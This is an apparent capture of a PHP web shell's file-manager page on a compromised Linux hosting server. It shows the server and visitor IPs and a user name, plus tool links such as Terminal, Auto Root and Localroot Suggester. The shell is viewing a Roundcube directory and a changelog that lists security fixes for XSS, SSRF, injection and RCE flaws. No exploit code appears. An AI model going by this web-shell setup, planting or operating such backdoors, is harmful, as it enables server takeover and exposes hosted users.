Linux server19.dn-server.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 46.209.20.154 & Your IP : 216.73.217.55
Domains :
Cant Read [ /etc/named.conf ]
User : emadteam
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
roundcube /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-08-11 18:06
php53
[ DIR ]
drwxr-xr-x
2026-08-11 18:06
php56
[ DIR ]
drwxr-xr-x
2026-08-11 18:06
php71
[ DIR ]
drwxr-xr-x
2026-08-11 18:06
php81
[ DIR ]
drwxr-xr-x
2026-08-11 18:06
php82
[ DIR ]
drwxr-xr-x
2026-08-11 18:06
changelog.txt
2.81
KB
-rw-r--r--
2026-08-10 05:35
clone.php
3.41
KB
-rw-r--r--
2026-08-10 08:00
config.inc.php
3.9
KB
-rw-r--r--
2025-02-10 04:28
fileindex.php
203
B
-rw-r--r--
2021-12-23 06:54
import.php
3.26
KB
-rw-r--r--
2026-08-10 08:00
info.xml
2.94
KB
-rw-r--r--
2026-08-10 05:35
install.js
1.25
KB
-rw-r--r--
2021-12-23 06:54
install.php
6.54
KB
-rw-r--r--
2026-08-10 08:00
install.xml
3.73
KB
-rw-r--r--
2021-12-23 06:54
md5
1.35
KB
-rw-r--r--
2026-08-10 08:00
notes.txt
1.23
KB
-rw-r--r--
2023-07-03 06:47
remove.php
3.11
KB
-rw-r--r--
2026-08-10 08:00
upgrade.php
7.06
KB
-rw-r--r--
2026-08-10 08:00
upgrade.xml
341
B
-rw-r--r--
2021-12-23 06:54
Save
Rename
## Release 1.6.18 - Password: Fix fatal error "Class 'Zxcvbn' not found" (#10274) - Fix out-of-bounds string reads on truncated compressed-RTF in the TNEF decoder (#10269) - Security: Add basic validation for content proxied by the css proxy - Security: Fix SSRF bypass via specific local address URLs using 100.64.0.0/10 and fe80::/10 nets - Security: Fix SSRF filter bypass via various forms of nip.io/sslip.io hostnames evading is_local_url() check - Security: Fix remote content blocking bypass via unclosed url() in a FuncIRI attribute - Security: Fix LDAP filter injection via unescaped %u/%fu/%d substitution into the `search_filter` - Security: Fix arbitrary Sieve script injection via a filter rule name bypassing `managesieve_disabled_actions` - Security: Fix RCE via `cmd_learn` driver of markasjunk plugin - Security: Fix IMAP command injection via mail search and LITERAL+ byte-count desynchronization - Security: Fix password's modoboa driver leak of an authentication token to a user-controlled host - Security: Fix stored XSS in "Add to address book" action - Security: Fix HTML/CSS sanitization bypass via SVG animate `by` attribute ## Release 1.6.17 - Enigma: Support automatic public key lookup (import) using HKP v1 protocol (#5314) - Enigma: Kolab WOAT Support (#8626) - Security: Fix an infinite loop in TNEF (winmail.dat) decoder (#10193) - Security: Fix various vulnerabilities in the password plugin using session-injected username - Security: Fix stored XSS via unescaped attachment MIME type on the attachment-validation warning page [CVE-2026-54432] - Security: Fix SSRF bypass via specific local address URLs - two new cases - Security: Fix zero-click stored XSS in plain-text rendering [CVE-2026-54433] - Security: Fix DoS via crafted compressed-RTF size in the TNEF (winmail.dat) file ## Release 1.6.16 - Fix potential too long value in IMAP ID command (#10136) - Security: Fix stored XSS/HTML/CSS injection in subject field of the draft restore dialog - Security: Fix CSS injection bypass in HTML sanitizer via SVG `<animate attributeName="style">` - Security: Fix pre-auth SQL injection in `virtuser_query` plugin via preg_replace backslash escape bypass - Security: Fix SSRF bypass via specific local address URLs - Security: Fix bypass of remote image blocking via CSS var() - Security: Fix local/private URL fetch bypass when remote resources were not allowed - Security: Fix pre-auth arbitrary file delete via redis/memcache session poisoning bypass - Security: Fix code injection vulnerability - remove support for code evaluation in LDAP `autovalues` option ## Release 1.6.15 - Fix regression where mail search would fail on non-ascii search criteria (#10121) - Fix regression where some data url images could get ignored/lost (#10128) - Fix SVG Animate FUNCIRI Attribute Bypass — Remote Image Loading via fill/filter/stroke